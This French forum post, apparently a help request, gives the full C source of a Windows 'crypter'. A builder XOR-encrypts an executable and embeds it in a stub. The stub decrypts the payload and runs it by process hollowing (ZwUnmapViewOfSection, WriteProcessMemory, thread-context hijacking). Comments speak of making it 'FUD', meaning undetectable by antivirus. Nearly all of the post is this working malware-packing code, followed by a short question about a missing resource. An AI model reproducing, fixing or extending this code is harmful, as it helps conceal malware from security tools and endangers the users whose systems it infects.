J'ai modifié la source :

Crypter : main.c
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
 
#include <stdio.h>
#include <windows.h>
#include <conio.h>
 
#define IDR_STUB 1
 
struct StubData{
    unsigned char * pFileBuffer;
    unsigned long FileSize;
    unsigned char * pKey;
    unsigned long KeySize;
};
 
/* Generic Error & Exit Function */
void error(char * msg)
{
    printf("%s\n", msg);
    exit(EXIT_FAILURE);
}
 
/* This Function Loads the File into the HEAP memory space */
void LoadFile(char File[20], struct StubData * sData)
{
 
    unsigned long BytesRead;
 
    HANDLE hFile = CreateFile(File, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
 
 
    printf("[*]Loading Portable Executable\n");
    if(hFile == INVALID_HANDLE_VALUE)
    {
        error("Error - Cannot open file");
    }
 
    sData->FileSize = GetFileSize(hFile, NULL);
    if(sData->FileSize == INVALID_FILE_SIZE)
    {
        CloseHandle(hFile);
        error("Error - Cannot retrieve file size");
    }
 
    sData->pFileBuffer = (unsigned char *)malloc(sData->FileSize);
    if(sData->pFileBuffer == NULL)
    {
        CloseHandle(hFile);
        error("Error - Cannot allocate room");
    }
 
    ReadFile(hFile, sData->pFileBuffer, sData->FileSize, &BytesRead, NULL);
    CloseHandle(hFile);
 
}
 
/* Simple XOR Encryption (NOT FUD -- Learn to Develop your own) */
void Encrypt(struct StubData * sData)
{
    int i,j;
    sData->pKey="AbcdefGhijkLmnoPkrstuVwxyZ";
    sData->KeySize=strlen(sData->pKey);
    j=0;
    i=0;
    printf("[*]Encoding\n");
 
    for(i;i<sData->FileSize;i++)
    {
  *(sData->pFileBuffer+i) ^=*(sData->pKey+j);
  j++;
 
  if (j>=sData->KeySize)j=0;
 
    }
 
}
 
/* Load the stub and resource data (sData) and write out a new file "crypted.exe" */
void Build(struct StubData * sData)
{
 
    HRSRC hRsrc;
    HGLOBAL hGlob;
    HANDLE hFile, hUpdate;
 
    unsigned long rSize;
    unsigned char * pBuffer;
    unsigned long BytesWritten;
 
    printf("[*]Building Crypted.exe\n");
 
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(IDR_STUB), "stub.exe");
    if(hRsrc == NULL)
    {
  error("Error Could not find resource");
 
    }
    rSize = SizeofResource(NULL, hRsrc);
 
    hGlob = LoadResource(NULL, hRsrc);
    if(hGlob == NULL)error("Error - Could not load resource");
 
    pBuffer = (unsigned char *)LockResource(hGlob);
    if(pBuffer == NULL)error("Error - Could not lock resource");
 
    hFile = CreateFile("crypted.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
  free(pBuffer);
  free(sData->pFileBuffer);
  error("Error - Could not create file");
    }
 
    if(WriteFile(hFile, pBuffer, rSize, &BytesWritten, NULL)==0)
    {
  free(pBuffer);
  free(sData->pFileBuffer);
  error("Error - Could not write to file");
    }
 
    CloseHandle(hFile);
    free(pBuffer);
 
    hUpdate = BeginUpdateResource("crypted.exe", FALSE);
    if (UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(10), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), sData->pFileBuffer, sData->FileSize)==0)
    {
  error("Error - Could not update resource");
    }
 
    if (UpdateResource(hUpdate, RT_RCDATA, MAKEINTRESOURCE(20), MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL), sData->pKey, sData->KeySize)==0)
    {
  error("Error - Could not update resource");
    }
    EndUpdateResource(hUpdate, FALSE);
 
}
 
main(int argc, char * argv[])
{
 
    struct StubData sData = {"",0,"",0};
 
    char name[20] = "Hello.exe";
    LoadFile(name, &sData);
    Encrypt(&sData);
    Build(&sData);
    free(sData.pFileBuffer);
    printf("[*]Finished Successfully");
 
    getch();
    getch();
}
crypter.rc :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
#define IDR_STUB 1
 
IDR_STUB STUB DISCARDABLE "stub.exe"

stub : main.c

Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
 
#include <stdio.h>
#include <windows.h>
 
typedef void (WINAPI *PTRZwUnmapViewOfSection)(
  IN HANDLE ProcessHandle, IN PVOID BaseAddress);
 
struct StubData{
    unsigned char * pFileBuffer;
    unsigned long FileSize;
    unsigned char * pKey;
    unsigned int KeySize;
    char FileName[MAX_PATH];
};
 
void LoadStruct(struct StubData * sData)
{
    HRSRC hRsrc;
    HGLOBAL hGlob;
 
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(10), RT_RCDATA);
    if (hRsrc == NULL)exit(EXIT_FAILURE);
 
    sData->FileSize = SizeofResource(NULL, hRsrc);
    hGlob = LoadResource(NULL, hRsrc);
    if (hGlob == NULL)exit(EXIT_FAILURE);
 
    sData->pFileBuffer = (unsigned char*)LockResource(hGlob);
    if (sData->pFileBuffer == NULL)exit(EXIT_FAILURE);
 
    hRsrc = FindResource(NULL, MAKEINTRESOURCE(20), RT_RCDATA);
    if (hRsrc == NULL)exit(EXIT_FAILURE);
 
    sData->KeySize = SizeofResource(NULL, hRsrc);
    hGlob = LoadResource(NULL, hRsrc);
    if (hGlob == NULL)exit(EXIT_FAILURE);
 
    sData->pKey = (unsigned char*)LockResource(hGlob);
    if (sData->pKey == NULL)exit(EXIT_FAILURE);
 
    GetModuleFileName(NULL, sData->FileName, MAX_PATH);
 
}
 
/* Simple XOR Encryption (NOT FUD -- Learn to Develop your own) */
void Decrypt(struct StubData * sData)
{
    int i=0,j=0;
 
 
 
    for(i=0;i<(sData->FileSize);i++)
    {
  *(sData->pFileBuffer+i) ^=*(sData->pKey+j);
  j++;
 
  if (j>=sData->KeySize)j=0;
 
    }
 
}
 
void runPE(struct StubData * sData)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    CONTEXT ctx;
 
    PIMAGE_DOS_HEADER pidh;
    PIMAGE_NT_HEADERS pinh;
    PIMAGE_SECTION_HEADER pish;
 
    PTRZwUnmapViewOfSection pZwUnmapViewOfSection = NULL;
    int i;
 
    memset(&si, 0, sizeof(si));
    si.cb = sizeof(STARTUPINFO);
    ctx.ContextFlags = CONTEXT_FULL;
 
    pidh = (PIMAGE_DOS_HEADER)&sData->pFileBuffer[0];
    if(pidh->e_magic != IMAGE_DOS_SIGNATURE)
    {
        return;
    }
    pinh = (PIMAGE_NT_HEADERS)&sData->pFileBuffer[pidh->e_lfanew];
    if(pinh->Signature != IMAGE_NT_SIGNATURE)
    {
        return;
    }
 
    CreateProcess(NULL, sData->FileName, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
 
    pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection");
    pZwUnmapViewOfSection(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase);
 
    VirtualAllocEx(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 
    WriteProcessMemory(pi.hProcess, (void *)pinh->OptionalHeader.ImageBase, &sData->pFileBuffer[0], pinh->OptionalHeader.SizeOfHeaders, NULL);
    for(i = 0; i < pinh->FileHeader.NumberOfSections; i++)
    {
        pish = (PIMAGE_SECTION_HEADER)&sData->pFileBuffer[pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i];
        WriteProcessMemory(pi.hProcess, (void *)(pinh->OptionalHeader.ImageBase + pish->VirtualAddress), &sData->pFileBuffer[pish->PointerToRawData], pish->SizeOfRawData, NULL);
    }
 
    GetThreadContext(pi.hThread, &ctx);
    ctx.Eax = pinh->OptionalHeader.ImageBase + pinh->OptionalHeader.AddressOfEntryPoint;
    SetThreadContext(pi.hThread, &ctx);
    ResumeThread(pi.hThread);
}
 
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    struct StubData sData;
    LoadStruct(&sData);
    Decrypt(&sData);
    runPE(&sData);
    return 0;
}
Je travaille sous Code::Blocks .

Après compilation du crypter et exécution, mon exécutable m'affiche l'erreur : Error Could not find resource , Cad qu'il n'a pas trouvé stub.exe.
Hors le stub se trouve dans me le même dossier que le project.

Comment résoudre ce problème ?